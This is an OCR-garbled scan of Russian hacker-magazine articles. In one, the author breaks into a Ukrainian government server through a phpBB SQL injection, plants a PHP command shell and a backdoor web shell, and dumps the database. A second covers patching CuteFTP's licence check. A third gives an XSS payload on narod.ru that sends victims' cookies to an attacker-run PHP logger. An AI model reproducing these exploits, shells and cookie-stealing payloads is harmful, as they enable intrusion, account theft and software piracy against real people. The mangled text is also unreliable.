ключи в реестре стандартными именами, этот случай тоже не 
исключение. Откроем прогу в Хью, выбираем поиск в текстовом 
режиме и ищем ІІ5егІ\Іате. Первое, что находится — это 




[первым делом надо скачать СиІеРТР Ноте] 



[ІІЧТЕКАСТІѴЕ 

ОІЗАЗЗЕМВІ_ЕВ] 

ЮА — наверное, самый мощный 
дизассемблер. Лучшее описание 
этого продукта представлено на 
сайте компании. 

«ЮА Рго является самым мощным 
и самым развитым интерактивным 
дизассемблером, доступным на се- 
годняшний день. Основные пользо- 
ватели нашего дизассемблера: 

- антивирусные компании; 

- по информационной безопасности; 

- эксперты по программному обеспечению; 

- разработчики программных защит. 



Основная задача, превращение 
бинарного кода в читаемый текст 
программы, дополнена многими 
возможностями, уникальными для 
этой программы: 

- распознавание стандартных библио- 
течных функций (технология РІ_ІВТ); 

- интерактивность работы; 

- развитая система навигации; 

- система типов и параметров функций; 

- встроенный язык программирования ЮС; 

- открытая и модульная архитектура; 

- возможность работы практически со все- 
ми популярными процессорами (список); 

- возможность работы практически со всеми 



популярными форматами файлов (список); 

- работа со структурами данных высо- 
кого уровня: массивами, структурами, 
перечисляемыми типами; 

- встроенный отладчик для ѴѴіп32. 

Типичные примеры задач, решае- 
мые с помощью дизассемблера: 

- анализ вирусов, троянов и других вре- 
доносных программ; 

- поиск ошибок в программах; 

- изучение полученного кода; 

- валидация программ; 

- оптимизация программ; 

- разработка защит и поиск дыр в защите» 
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[ХАКЕР 07 [79] 05 > ВЗЛОМ 066 ] 




[отладчик ОІІуйВ — прекрасный инструмент для крякера] 



РедІІзегІЧате (не правда ли, оригиналь- 
но?). Переходим в Ьех режим, нажав Епіег 
один раз. Ставим курсор на начало строки 
и запускаем поиск перекрестных ссылок. 
Оказывается, здесь идет запись имени в 
реестр — это видно по вызову Апи 
РедЗеіѴаІиеА. Жмем $Ьіііі+Е7, а здесь как 
раз то, что надо. По х-геі видно, что вызыва- 
ется функция ОпІпіЮіаІод, которая, скорее 
всего, создает аЬоиі-диалог (это можно 
явно проверить в дебаггере, поставив туда 
бряк). Если заглянуть в функцию, которая 
чуть выше вызывается на 00483967, выясня- 
ется, что там осуществляется подключение 
к уже знакомому серверу в инете. 

[а где онлайн-чек?] 

00460160: 
хог еах, еах 
пор 
пор 
пор 
пор 
пор 
пор 
пор 
пор 

іезі аі, аі 
Іплр 0046С56Р 
0046С171 : 
пор 

Хог еах, еах по адресу 0046Ь7а2 нужно по- 
менять на іпс еах, пор, чтобы всегда возвра- 
щалась единица. Теперь осталось узнать, от- 
куда именно в реестре читается имя. Запус- 
каем Ольку, загружаем файл (Еііе -> Ореп). 
Ставим бряк на 0046Ь7а2, пускаем прогу. Те- 
перь вызывается аЬоиі-диалог, срабатывает 
наш бряк, и выполнение программы останав- 
ливается. Затем выполняем сі есх: «.ОЕЕАШТ 
\Зоііѵѵаге\ѲІоЬаІЗСАРЕ\СиіеЕТР Ноте». 
Здесь 0x80000003 означает, что ключ нахо- 
дится в НКЕѴ_ІІ5ЕР5. Теперь создаем гед.гед- 
файл такого содержания: 

[люби себя и плюй] 

ЕІЕ0Е0ІТ4 

[НКЕУ_ІІ8ЕЕ{3\.ОЕРАІЛТ\ЗоІіѵѵаге\ОІоЬаІЗ 
САРЕ\СіЛеРТР Ноте] 

"ВедІІ5егМаппе"="Здесь твой ник" 

Теперь, когда ты выполнил этот файл, ин- 
формация в реестре обновится и програм- 
ма будет показывать в аЬоиі'е твой ник. 

[патч "на память"] Патчи обычно пишутся на 
ассемблере или генерируются патч-гене- 
рилками, для этого всего-навсего нужны 
два файла: оригинальный и пропатченый. Я 
примерно опишу здесь, как пишутся патчи. 
Скомпилированный ехе'шник при этом бу- 
дет весить всего 2,5 Кб. 

Будем писать в Мазт32, а для тех, кто не лю- 
бит продукты Мелкомягких, советую прибег- 




[обрубаем онлайн-проверку] 



нуть к помощи Еазпгі. Для дальнейшей автома- 
тизации, чтобы не переписывать код для каж- 
дой новой проги, а только поменять данные, 
надо придумать некую структуру данных. Да- 
леко за учебниками ходить не надо: не так уж 
это и трудно. Для структуры нам нужно: коли- 
чество оффсетов (адреса, по которым будут 
патчиться байты), сами оффсеты, ітадеЬазе 
ехе'шника (адрес, по которому файл грузит- 
ся в память) и, конечно, оригинальные и изме- 
ненные байты. Структура будет выглядеть так: 

[структура данных] 

ріасез сісі 03 

ітадеЬазе сісі 00400000Ь 

оіізеіз сісі 0046Ьс95Ь 
сІЬ 06 

сісі 0046с160Ь 
сІЬ 18 

сісі 0046с583Ь 
сІЬ 02 

оІсЦэуІез сІЬ От, 84Ь, ІЬЬ, 04Ь, 00, 00 
СІЬ От, 85Ь, 73Ь, 02Ь, 00, 00, 8аЬ, 44Ь, 
24Ь, 38Ь, 84Ь, 0с0Ь, От, 84Ь, ОібЬ, ОЗЬ, 00, 00 
СІЬ ЗЗЬ, 0с0Ь 

раісЬ_Ьуіез сІЬ 0е9Ь, ІсЬ, 04Ь, 00, 00, 90Ь 
СІЬ ЗЗЬ, 0с0Ь, 90Ь, 90Ь, 90Ь, 90Ь, 90Ь, 
90Ь, 90Ь, 90Ь, 84Ь, 0с0Ь, 0е9Ь, ОіеЬ, ОЗЬ, 
00, 00, 90Ь 
СІЬ 40Ь, 90Ь 

В оіізеіз первое число — это сам оф- 
фсет, а второе — количество байт, ко- 
торые нужно пропатчить там. В 
оІсІ_Ьуіе5 находится массив оригиналь- 
ных байт, а в раісЬ_Ьуіез — пропатче- 
ных, соответственно. Теперь осталось 
написать пару функций. Одна будет 
проверять байты, чтобы они совпадали 
с оригинальными. Таким же способом 
обычно проверяют версию ехе'шника. 
Вторая функция будет иметь почти та- 
кой же код, а ее отличие состоит в том, 
что она не сравнивает байты, а записы- 
вает их в файл — патчит. 

Файл открываем с помощью функции 
СгеаіеЕіІе, ее параметры можно узнать в 
справочнике. Потом проецируем файл на 
память при помощи СгеаіеЕіІеМарріпд и, 
когда нужно получить адрес в памяти. 



МарѴіеѵѵОіЕіІе. Основной цикл проверки 
выглядит так: 

[цикл, проверяющий байты на совпадение 
с оригинальными] 

тоѵ тар, еах 
хог ебі, есіі 
хог езі, езі 
.ѵѵЬіІе есіі < ріасез 
ризЬ есіі 

Іеа еах, [оіізеіз+ебі*4] 

.іі есіі != 0 

асісі еах, есіі 
.епбіі 

тоѵ 2 х еЬх, Ьуіе ріг[еах+4] 

Іеа есх, [оІб_Ьуіез] 

.іі есіі != 0 

тоѵ 2 х есіі, Ьуіе ріг[еах-1] 
асісі езі, есіі 
.епбіі 

асісі есх, езі 
тоѵ есіі, еЬх 
тоѵ еах, [еах] 
тоѵ еЬх, тар 
зиЬ еах, ітадеЬазе 
асісі еЬх, еах 
.ѵѵЬіІе есіі != 0 

тоѵгх еах, Ьуіе ріг[есх] 
стр аі, Ьуіе ріг[еЬх] 

\т @Р 

хог еах, еах 
Ітр _ехіі 

@ @: 
іпс есх 
іпс еЬх 
бес ебі 
.епбѵѵ 
рор ебі 
іпс ебі 
.епбѵѵ 

В цикле структура обрабатывается и ориги- 
нальные байтики сравниваются с теми, что в 
файле. Если они совпадают, возвращается 
единица. Чтобы эта функция заработала как 
патчер, нужно поменять стр аі, Ьуіе ріг(еЬх) 
в цикле на тоѵ Ьуіе ріг(еЬх), аі ну и, соответ- 
ственно, джампы убрать, а также вместо Іеа 
есх, (оІсЦэуіез), прописать раісЬЦэуіез. 

На этой мажорной ноте я позволю себе 
откланяться. Если будут вопросы, пиши © 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20МЕ РЕВВІІМ НЬЮСЫ 




ИНОГДА ОТ НЕЧЕГО ДЕЛАТЬ И ОТ ОДНОЙ ВЫПИТОЙ 
КРУЖКИ КОФЕ СОВЕРШАЮТ НЕВЕРОЯТНЫЕ ПОС- 
ТУПКИ. К ПРИМЕРУ, ЛОМАЮТ ЗА ПАРУ ЧАСОВ БЕЗ 
ОСОБЕННОГО ГЕМОРРОЯ ГОСУДАРСТВЕННЫЙ 
ШІХ’ОВЫЙ СЕРВЕР. ТАК И ПОЛУЧИЛОСЬ В ЭТОТ РАЗ. 
Я ПОЧУВСТВОВАЛ ПРИЛИВ КРЕАТИВА, ПРИЯТНОЕ 
ЩЕКОТАНИЕ В КОНЧИКАХ ПАЛЬЦЕВ, ЗАВАРИЛ КРУЖ- 
КУ ПОХАБНОГО РАСТВОРИМОГО КОФЕ И ОТПРАВИЛ- 
СЯ НАВСТРЕЧУ ПРИКЛЮЧЕНИЯМ. I сік_ (с1к_@из+.ги) 





На сайте Шр://ш24- 
іеат.пеі ты можешь 
поучаствовать в разработке 
скрипта, описанного 
в статье. 

На нашем диске ты найдешь 
скрипт, который я 
использовал в этой статье. 



Кружка кофе 



История взлома одного 
государственного сервера 

[глаза моего врага] После надоедливых 
разговоров на одном из ІРС-каналов мне за- 
хотелось острых ощущений. Недолго думая, 
я набрал в адресной строке давно извест- 
ный всем адрес давно известного всем по- 
исковика и лллл/.доодіе.сот. Как обычно, пе- 
ред моими сонными глазами появляется по- 
исковая строка для определенного запро- 
са. Ломать какой-то банальный сайт вроде 
конторы ООО «Геркулес-2002» мне совер- 
шенно не хотелось, и я решил, что этой ночью 
моей целью будет сайт в зоне .доѵ. В моей 
голове промелькнула мысль о том, что 
обычно все правительственные серверы 
неприступны и поломать их бывает очень 
трудно, порой даже невозможно. Но как 
там в рекламе? «Невозможно — слово для 
слабаков». Поэтому я тут же отдал Гуглу зап- 
рос іпигі .доѵ и стал изучать список прави- 
тельственных серверов. Ничего толкового 
видно не было, я листал страницы, но глазу 
было не за что зацепиться. И вдруг я вспом- 
нил, что скоро у моего друга с Украины день 
рождения и что я обещал подарить ему шелл 
на любом украинском сервере. Что ж, се- 
годня мы совместим приятное с полезным. 

[на поиски багов!] Сказано — сделано, 
запрос сменился на іпигі. доѵ.иа. Я не стал 
останавливаться на долгих поисках и клик- 
нул по первой попавшейся на глаза ссыл- 
ке. И тут я впервые взглянул в «лицо» своей 
будущей жертве :). Прежде чем начинать 
ковыряться на вебе, я решил немного обе- 
зопасить себя. Я стукнул к моему старому 
другу и попросил у него быстрый и ано- 
нимный проксик. Через пять минут моя 
просьба была выполнена и прокси был 
уже в моих руках. Я поехал дальше. Неп- 
лохой дизайн смотрел на меня из монито- 
ра, видно, над ним работал профессио- 
нальный веб-мастер. Но изменений ди- 
зайна в моих планах на ту ночь не было. 
Я быстро пробежался по нескольким лин- 
кам и понял, что движок сайта написан на 



рГір, и это радовало меня, поскольку искать баги в рГір-сцена- 
риях — одно удовольствие. Я начал подставлять различные сце- 
нарии для поиска іпсіисіе-бага, щупал скрипты на зді-инъекции, 
но так ничего и не получил! Раздраженный этими неудачными 
поисками бага, я хотел бросить все и пойти спать, как вдруг 
немного приоткрытыми глазами я заметил в самом низу ссылку 
на форум. И что ты думаешь? 

Конечно же, повторялась старая история, в которой участво- 
вал наш любимый рГірВВ. Правда, администратор ресурса был 
не совсем уж ушлепком и проапгрейдил ее с печально извест- 
ной 2.0.10 до 2.0.13. Тут я вспомнил, что недавно читал про най- 
денную уязвимость в этой версии форума, вернее, не в самом 
форуме, а в модуле сіоѵѵпіоасіз.ріір. Я решил попытать удачу 
и попробовать заюзать этот баг. Прежде всего, надо было вы- 
яснить, установлен ли на форуме бажный файл. Я вбил в адрес- 
ную строку и /ѵѵѵѵ.ѵісііт.доѵ.иоДогит/сІоѵѵпІоосІз.рІір. Сразу 
после того как страница загрузилась, стало понятно, что в этот 
вечер ситуация складывается благоприятно для меня: на лома- 
емом ресурсе был установлен уязвимый сценарий. Если ты ре- 
гулярно читаешь X, то помнишь, что Форб в обзоре сплойтов 
недавно писал о перловом скрипте, который, используя ошиб- 
ку в сіоѵѵпіоосіз.ріір, получает тсІ5-хэш определенного пользо- 
вателя. Меня, само собой, интересовал админский пароль. По- 
этому я загрузил с ѵѵѵѵѵѵ. хакер. ги/розі/261 31 /ехрІоіі.М сплоит 
и натравил его на форум: 

$ ./рНрЫэ.рІ ѵ\лллл/.ѵіс11т.доѵ.ик1югит 2 

Н Соппесііпд... 

(+) Соппесіеб 
Н Зепсііпд Оаію... 

Н Оаіа Зепі, ѴѴаіііпд Іюг гезропзе... 

(+) ІѴЮ5 НазП Іюг изег \л/ііН ісІ=2 із: 
ае 1 86асІ8а 1 сІе3 1 2Ь4Ь 1 364569 1 8с8 1 6Ь 

Я просто не поверил своим глазам, когда высветился т65-хэш 
админского пароля. Несмотря на то, что об этом баге извест- 
но уже порядочное время, админ не удосужился залатать ды- 
ру и поплатился за собственную халатность :). Ну что же, про- 
должим. Надо отметить, что сам админский доступ к форуму мне 
не был нужен, однако он вполне сгодился бы как перевалочный 
пункт на пути к шелл-аккаунту. 

Чтобы войти на форум с админскими правами, нужно зареги- 
стрироваться на форуме и затем отредактировать собствен- 
ные кукисы (например, при помощи Соокіе ебііог'а), заменив 
в них идентификаторы пользователя на украденные. После 
этого можно войти на форум под админскими правами и за- 
качать при помощи того же модуля то6_аііасП, рНр-скрипт 
примерно такого содержания: 




<? 

5у5Іѳт($_ѲЕТ (стсі)); 

?> 

Этот нехитрый сценарий позволил мне выполнять на сервере ко- 
манды с правами апачевского пользователя. Первое, что я решил 
сделать — это закачать на сервер более удобный скрипт для ра- 
боты с файловой системой. 

[удача в кармане] Я решил не останавливаться на каких-то стан- 
дартных скриптах типа гетѵіе\л/ и заюзал совсем новый и еще не 
опробованный лично мной скрипт — І\ІІХ РЕМОТЕ \Л/ЕВ ЗНЕІ_І_. 

После недолгих поисков я заметил папку іепгір, в которую 
мне было разрешено записывать файлы. На сервере стояла 
утилита \л/деі. Я без проблем скачал систему и мог теперь 
работать с сервером через удобный интерфейс. Большим 
плюсом было то, что форум лежал на одном серваке с сай- 
том, и после получения веб-шелла на форуме мне открывал- 
ся путь в сердце сервера. Не раздумывая, я вбил следую- 
щую команду: ипате -а. Оказалось, машинка крутится под 
ЕгееВЗЭ 5.2.1-РЕІ_ЕАЗЕ. В голове пронесся большой облом: 
публичного сплоита под эту систему не было, да и просить 
мне было не у кого :(. Ну что же, оставалось руководствовать- 
ся логикой. Я решил сразу проверить конфиг форума, для че- 
го выполнил вот эту команду: 

# саі сопІід.рГір 

ЗсІЬтз = 'туздГ; 

ЗсІЫяозі = 'ІосаІГюзТ; 

ЗсИэпате = 'зтісІаЭюгит 1 ; 

ЗсІЬизег = 'зтісіа 1 ; 

$сІЬра55\л/сІ = 'кВВЗРіИИх 1 ; 

«Что мог дать тебе конф?» — спросишь ты меня. Ничего особенно 
важного, но если попробовать подключиться по ГІр с логином и па- 
ролем от БД, может, меня и впустили бы на сервер. Так и случилось: 
я подключился к серверу, и удача опять была на моей стороне. 

Я подумал, что если с ТТр меня соединило без проблем, то почему 



бы не попробовать законнектиться и по 53Н. От радости глаза мои 
открылись, как у бешеной макаки, которую не кормили банана- 
ми лет пять :). Как ты уже понял, соединение прошло успешно, и у 
меня был полноценный аккаунт в системе. 

Итак, просьбу друга я уже выполнил. Теперь нужно было ре- 
шить, что еще я могу поднять с этого сервера. Надо же было 
и для себя извлечь что-то ценное :). Было решено задампить 
базу сервера, что при помощи скрипта делается в два сче- 
та. Я сделал это очень быстро, и теперь у меня оказалась 
вся БД с этого сайта. Остатки кофе в моей голове подсказы- 
вали залезть в корневой каталог всего сервака: вдруг най- 
дется еще что-то интересненькое. 

Как ни странно, у меня без проблем получилось перейти в ко- 
рень файловой системы и начать лазать по каталогам. Мои 
глаза чуть не вылетели из орбит, когда я увидел, что на этом 
сервере хостятся еще около девяти сайтов, в числе которых 
был еще один в домене доѵ.ио. В папку с этим только что най- 
денным сайтом меня впустили, но это было уже не так важ- 
но, и я решил передохнуть. На часах было 5:01, небо светле- 
ло. В мою открытую форточку стал пробираться запах утрен- 
ний свежести. Я был очень доволен собой, потому что впер- 
вые в моей практике взлом был таким легким. Теперь можно 
было без проблем идти спать. 

Наутро я стукнул к другу, поздравил его с днем рождения и пода- 
рил украденный шелл. От радости он зафлудил меня благо- 
дарностями :). 

[мораль есть везде] Вот видишь, как легко иногда проводятся 
взломы государственного имущества :). Из-за детского бага в 
форуме пострадал весь сервер. Не повторяй таких же оши- 
бок, старайся патчить весь софт и все скрипты на своем сер- 
ваке, и тогда вероятность того, что тебя похакают, значитель- 
но уменьшится. Хочу сказать еще вот что. Может, это и говори- 
ли сотни раз, но я все же повторюсь и открою твои глаза на 
некоторые вещи. По моему мнению, не бывает безопасного 
программного обеспечения. Вся истина в том, что в каком-то 
софте багов меньше, в каком-то больше. Если ты считаешь, 
что юзаешь полностью безопасный софт, то знай: найдется 
умник, который не поленится и поломает тебя © 



[ЧТО ЭТО ЗА БАГ?] 

Как легко догадаться, извлечение 
пользовательских хэшей из БД 
осуществляется через зяі-іпіесііоп. 
В самом деле, если посмотреть 
на код сплоита, легко заметить, 
что составляется обыкновенный 
ипіоп-запрос, который склеивает 
пустой поток вывода с еще одним 
запросом, получающим хэш поль- 
зовательского пароля: 

сІоѵѵпІоасІ5.р[ір?саІ=-1%201ІМІО№/о20 

ЗЕЕЕСТ%200,изег_раззѵѵогсІ,0,0,0,0,0,0,0 

%20РЕЮМ%20рІірЬЬ_изег5%20ѴѴНЕВЕ 

%20изег_ісІ=$изег_ісІ/* 

Баг детский, однако из-за него уже 
пострадало немалое количество ре- 
сурсов. Так что не поленись и до- 
бавь в код системы проверку пере- 
менной саі: по логике программы 



там может быть только лишь іпіе- 
дег. Ну, или скачай обновление, ко- 
торое заботливо выложили на стра- 
нице ѵтѵѵ.рІірЬЬ.сот/рІірВВ/ѵіеѵѵ- 
іоріс.рІір?і=74505. 

[ЫІХ РЕМОТЕ ѴѴЕВ ЗНЕЦ. 0.5а ІЛе] 

Вот несколько возможностей 
скрипта: 

Ш поддержка авторизации при 
обращении к скрипту; 

\2\ информация о системе: 

- сервер; 

-ОС; 

- привилегии; 

- текущий каталог; 

- твой ІР; 

- РНР ѵегзіоп; 

- Ю владельца процесса; 

- МуЗОІ_ іпТо; 

- проверка доступа к системным 
файлам и каталогам. 



[з] удобная навигация по файло- 
вой системе сервера с широкими 
возможностями: 

- копирование, удаление, скачи- 
вание, просмотр, редактирование, 
обнуление, загрузка файлов; 

- возможность полной замены 
нужных строк в файлах (то же 
асзезз.Іод); 

- создание, удаление, архивиро- 
вание каталогов; 

- возможность отослать любой 
файл на свой е-таіі. 

Й установка бэкдора: 

- возможность забиндить порт 
с помощью регі / С; 

- установка соппесІ-Ьаск бэкдора 
с помощью регі / С. 

Подробнее о скрипте ты сможешь 
узнать на Мір://ги24-іеат.пеі, там же 
возможно присоединиться к разра- 
ботке ІМІХ РЕМОТЕ ѴѴЕВ ЗНЕІ_І_. 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ЦМІХОІР СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ ГЕВРШМ НЬЮСЫ 




Топим Народ.ру 



Мелкие бреши крупных систем 



ЕСЛИ ТЫ ЧИТАЕШЬ НАШ ЖУРНАЛ ДАВНО, ТО 
НАВЕРНЯКА ВСПОМНИШЬ МНОЖЕСТВО ИНТЕ- 
РЕСНЫХ ВЗЛОМОВ. ЛОМАЛИ ВСЕ — ОТ ДОМАШ- 
НИХ СТРАНИЦ ВАСИ ПУПКИНА ПУТЕМ ПЕРЕБОРА 
ПАРОЛЕЙ ДО КРУТЫХ ПОРТАЛОВ ТИПА МАІЬ.ВІІ. 
Я САМ НЕ ТАК ДАВНО ПИСАЛ О БАГАХ В НОВОЙ 
ПОЧТЕ. НО ЕСТЬ САЙТЫ, ВЗЛОМАТЬ КОТОРЫЕ 
НАШИМ ПАРНЯМ НЕ УДАВАЛОСЬ. НАПРИМЕР, 
РАМБЛЕР. РУ ИЛИ ЗНАМЕНИТЫЙ БЕСПЛАТНЫЙ 
ХОСТИНГ НАРОД.РУ. ЗАЩИТА ЭТИХ РЕСУРСОВ 
ПРОДУМАНА ДО МЕЛОЧЕЙ И ДЕФЕЙСНУТЬ ИХ 
ПРАКТИЧЕСКИ НЕВОЗМОЖНО. ОДНАКО МЕЛКИЕ 
ПРОРЕХИ В НИХ ВСЕ ЖЕ ЕСТЬ. СЕГОДНЯ Я РАС- 
СКАЖУ В ЭТОЙ СТАТЬЕЙ О ТОМ, КАК БЕЗО ВСЯ- 
КОГО ГЕМОРРОЯ УТАЩИТЬ АККАУНТ С НАРОД- 
НОГО САЙТА I Даня ака хЫТ ($1теат@05коІпеТ.ги I 3344-37-228) 



[пагосі.ги] Народ.ру — подпроект поисковой системы Яндекс. 
Это, пожалуй, самый известный бесплатный хостинг в рунете, имею- 
щий репутацию свалки. И действительно, чего тут только нет: и до- 
машние страницы, и сайты липовых корпораций, и представитель- 
ства кидал, предлагающих заработать лимон баксов, вложив всего 
полтинник вечнозеленых. Помимо хостинга, действует почтовая 
служба. И не только почтовая: Яндекс буквально с головы до ног об- 
рос разными сервисами, которые давно привлекали мое внимание. 
Свой путь я начал с головной страницы народ.ру. Поддавшись рек- 
ламным лозунгам, зарегистрировался и создал свой сайт — 
хЫі7 7. пагосі.ги. Кстати, должен отметить, что, вопреки расхожему 
мнению, народ.ру вовсе не такой уж и детский сервис. Поимев 
свой аккаунт, ты при помощи специальных мастеров сможешь 
сверстать чудо-юдо-творение всего за 60 секунд. Правда, и качест- 
во такого сайта будет на уровне. Панель управления сайтом меня, 
честно говоря, впечатлила: куча всяких интересных настроек, плюс 




На нашем диске ты найдешь кучу дополнительной информации по С55- 
атакам, в основном, наши статьи, уже опубликованные по этой теме. 







бонусные фичи типа автоматизации платежей через систему Яндекс.Деньги и 
бесплатных дополнительных скриптов. В общем, система продумана очень хо- 
рошо, в том числе с точки зрения безопасности. Увы, за всю историю общения 
с народом мне так и не удалось вывести на экран сообщение об ошибке. 

[начинаем осмотр пациента] Зарегистрировавшись в системе, я принялся ощу- 
пывать ее. Испытания начал с конструктора сайтов. Создание сайта при помощи 
конструктора на пагосі.ги разбито на несколько этапов. Сначала предлагалось 
выбрать шаблон оформления, затем дизайн главной и других страниц. Все дан- 
ные, которые запрашивались — информация для непосредственного вбивания в 
будущий файл. Одним словом, опасных моментов практически не было. Набро- 
сав таким образом несколько страниц, я приступил к дальнейшему исследова- 
нию пользовательской панели. Мое внимание привлек пункт «Управление файла- 
ми и НТМІ_-редактор». Перейдя по ссылке, я увидел до боли знакомую форму уп- 
равления файловой системой. Я уже имел дело с похожими скриптами на других, 
менее известных ресурсах. Практически все они страдали опасным недугом — 
позволяли пользователю выходить за пределы собственной директории. Недолго 
думая, я попытался создать файл с именем .. /../../../../../../хакер. Ніт. Чтобы было, 
если бы мне удалось сделать это, объяснять не надо: простейший АЗР-скрипт 
вмиг произвел бы дефейс (серверы народ. ру работают под управлением 
\Л/іпсІо\л/5 Зегѵег, хоть сканеры это и не показывают). Но у меня ничего не вышло :(. 

[облом] Появилось сообщение, в котором дотошно рассказывалось о правилах 
создания файлов. Упомяну о сканерах безопасности. Особо не веря в успех их ис- 
пользования на данном серваке, я все же не преминул воспользоваться Х-зрі- 
сіег'ом. Результаты его работы были нулевыми. Паук не смог определить даже тип 
операционной системы, под которой работает хостинг (то, что всем заправляет 
ѴѴіпсІомз Зегѵег, я знал уже давно от знакомых веб-мастеров). После экспериментов 
с созданием файла я перешел к процедуре удаления :). И снова обломался. 
Скрипты народа никак не хотели выпускать меня в пространство вне отведенных 
рамок. Еще полчаса бессмысленного копания в панели управления показали, что 
«маленькой победоносной войной» тут не справишься, и я принялся искать другие 
потенциально опасные точки. Мое внимание привлекли дополнительные скрипты, 
которые раздаются автоматически вместе с местом под сайт: форум, диезіЬоок, чат. 



Пропарившись несколько минут с форумом и чатом, я так 
и не заметил ничего подозрительного: все входящие дан- 
ные тщательно фильтровались, ни одно пробное сообще- 
ние типа <М>ХАКЕР</М> не отобразилось должным об- 
разом. Начиная опыты с гостевой книгой, я уже подсозна- 
тельно понимал, чем все кончится, и был прав. Уязвимос- 
тей не было. Правда, в ходе тестирования я заметил, что 
если передать в строке параметров не номер юзера, а 
его ник, то скрипт сработает одинаково. Тут запахло ЗОІ_- 
инъекцией, и ближайшие полчаса я пытался составить 
запрос к базе данных. Но к успеху это не привело: оче- 
редной облом полностью испортил мне настроение, и я 
решил на время отложить штурм бастиона. Я даже хотел 
уже идти спать, но в мою асю постучал очень хороший 
друг, с которым я постоянно общаюсь в Сети. Он расска- 
зывал о том, что, гуляя по Сети, он наткнулся на интерес- 
ный линк, который вел в чат-комнату на народ.ру. 

[необычная зацепка] Весело проведя время, я уже за- 
хотел уходить и стал сворачивать софт. Но когда дело 
дошло до оси, я решил еще пару часиков потусовать в 
инете. В асе красовалась ссылка на чат-сообщество, 
по которой я перешел каких-то 20 минут назад. Но тог- 
да я не обратил на нее внимания. Вот этот линк: 

ІіНр://пагосІ.уапсІех.ги/сІтаѴсІіаЕхИіппІ?изегісІ=1 72890212 
88240647028&сІта1ісІ=1 43&іетрІаіе=6&СІтаіТШе=%Р1 % 
ЕЕ%ЕЕ%Е1 %Р9%Е5%Р1 %Р2%Е2%ЕЕ%ЗА+%СЕ%С1 
% С С % С 5 % С О ++ % С 8 % С О % О 2 % С 8 % С С % С О % О В % С 
С % С 8 + % О 4 % С Е % О 2 % С А % С 0 % С С % С 8 % 2 8 % Е 2 % Р 5 
% Е Е % Е 4 + % Р 2 % Е Е % Е В % Р С % Е А % Е Е + % Е 4 % Е 5 % Е 2 % 

Е Е % Р7% Е А% Е 0% Е С%2 9 &со т_і сі = 9 6366 

Вроде ничего необычного. Я сам не придал бы никакого 
значения этой ссылке, если бы не вспомнил, что при тес- 
тировании, которое я провел ранее, ссылка на чат была 
немного иной. После разбора передаваемых парамет- 
ров у меня появилась слабая надежда на проведение 
сзз-атаки. Обрати внимание на параметр СПаіТііІе: его 
значение очень похоже на текст в Нех-кодировке. Пос- 
мотри на скриншот и подумай, куда вставляется значе- 
ние этой переменной. Правильно: в название сообще- 
ства. Как я уже говорил, ранее все скрипты народ.ру 
тщательно фильтровали входящие параметры, однако 
программисты могли не учесть опасности подмены за- 
головка сообщества. Чтобы проверить свои предполо- 
жения на практике, я обратился к следующей ссылке: 

Иир://пагосІ.уапсІех.ги/сИаѴсІіа1.х[іітІ?и5егісІ=1 7289021 2 
88240647028&сІіаііс1=1 43&іетрІаіе=6&СІгаГГШе=<І'і1 >Х 
АКЕР</М >&сот_ісІ=96366 
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[главная страница зііесііу.ги] [СЗЗ — болевая точка почти всех крупных проектов] 



[понеслась!] Сервер вернул мне страницу, 
которую ты можешь наблюдать на соответ- 
ствующем скрине. Было очевидно, что пе- 
ременная вообще никак не фильтрова- 
лась, и я составил другой запрос: 

ИНр://пагосІ.уапсІех.ги/сІіаѴсІіа1.хІіітІ?изегісІ 
=1 7289021 288240647028&сІіаіісІ=1 43&*ет- 
рІаІе=6&СІіаГГШе=<5сгірІ 
Іапдиаде=”іаѵазсгірГ>аІегі(с]оситепі.соок- 
іе);</зсгірЬ&сот_ісІ=96366 

Функция аІегТО исправно выдала мне содер- 
жимое всех куков, которые народ. ру устано- 
вил на моем компе. В ходе авторизации де- 
тище Яндекса устанавливает пользователям 
кукисы, в которых содержится вся нужная 
инфа для доступа к мылу и сайту жертвы. 
Подробно расписывать, что делать дальше, 
я не буду: уже писал в позапрошлом номе- 
ре, да и вообще о проведении СЗЗ-атак мы 
писали не раз и не два. Повторюсь лишь, что 
нужен хостинг с поддержкой РНР, куда не- 
обходимо залить сценарий \л/гііе.рИр: 

<? 

И ($ОиЕВУ_ЗТВІМО== ,ІМ ) ехіі; 

$Ыореп ("сІаіа.сІаГ,"а+"); 

%гі*е($Т, "$ОІІЕВѴ_ЗТВІІ\Ю \п"); 

^сІозе($І); 
есііо "Все ок"; 

?> 

Этот сценарий записывает параметры, пе- 
реданные ЗаѵаЗсгірі-жуком. Самого жучка 
внедряем в ссылку и подсовываем ламеру. 
Вид ссылки должен быть следующий: 

ИНр://пагосІ.уапсІех.ги/сІіаѴсІіа1.хІіітІ?изегісІ 
=1 7289021 288240647028&сІіаіісІ=1 43&*ет- 
рІаІе=6&СІіаГГШе= <зсгірІ 
Іапдиаде=”іаѵазсгірГ>ореп('Ііир://хЬіі.5ѵѵіісІі 
.рр.ги/ѵѵгііе.рИрЗ'+сІоситепі.соокіе); 
</5СгірЬ>сІозе();&сот_ісІ=96366 



Естественно, вместо Шр://хЬіі. 2 \л/іісІі.рр.ги/ нужно поставить адрес хоста хакера. Как я уже 
упоминал в прошлой статье, код линка лучше перевести в Гіех-кодировку, чтобы ламер не за- 
палил теги в ссылке. Результат всей операции —украденные куки юзера. Печенье устанавли- 
вается во время авторизации. Для того чтобы успешно залогиниться под видом жертвы, нужно 
для начала завести свой аккаунт и пройти авторизацию, тогда появятся печенья, которые поз- 
же можно отредактировать. Лично я пользуюсь для этих целей Соокіе ЕсІіТоГом. Данная прог- 
рамма предельно проста в освоении. Все, что требуется, так это указать хост куки, которого 
нужно подправить. После этого откроется простенькое окно, в которое вместо своих записей 
нужно вбить украденные. Сохранить изменения и ползти на головной сайт народа — прове- 
рять правильность прохождения квеста. Об этом известит приветствие в правом верхнем углу. 

[город Сайтов] После опытов с народ. ру мне захотелось прощупать какой-нибудь дру- 
гой бесплатный хостинг, на котором располагался бы онлайновый конструктор. Таким 
сервисом стал ЗііеСііу.РІІ. Однако я не только не смог взломать этот конструктор — у ме- 
ня не получилось даже зарегистрироваться. Сервис никак не хотел высылать мне па- 
роль на указанное мыло. Повторив процедуру еще несколько раз, я пришел к выводу о 
том, что сервису не нужны новые пользователи, и приступил к «поверхностному» изуче- 
нию проекта. ЗііеСііу.ги интересен тем, что люди, воспользовавшиеся хостингом этого 
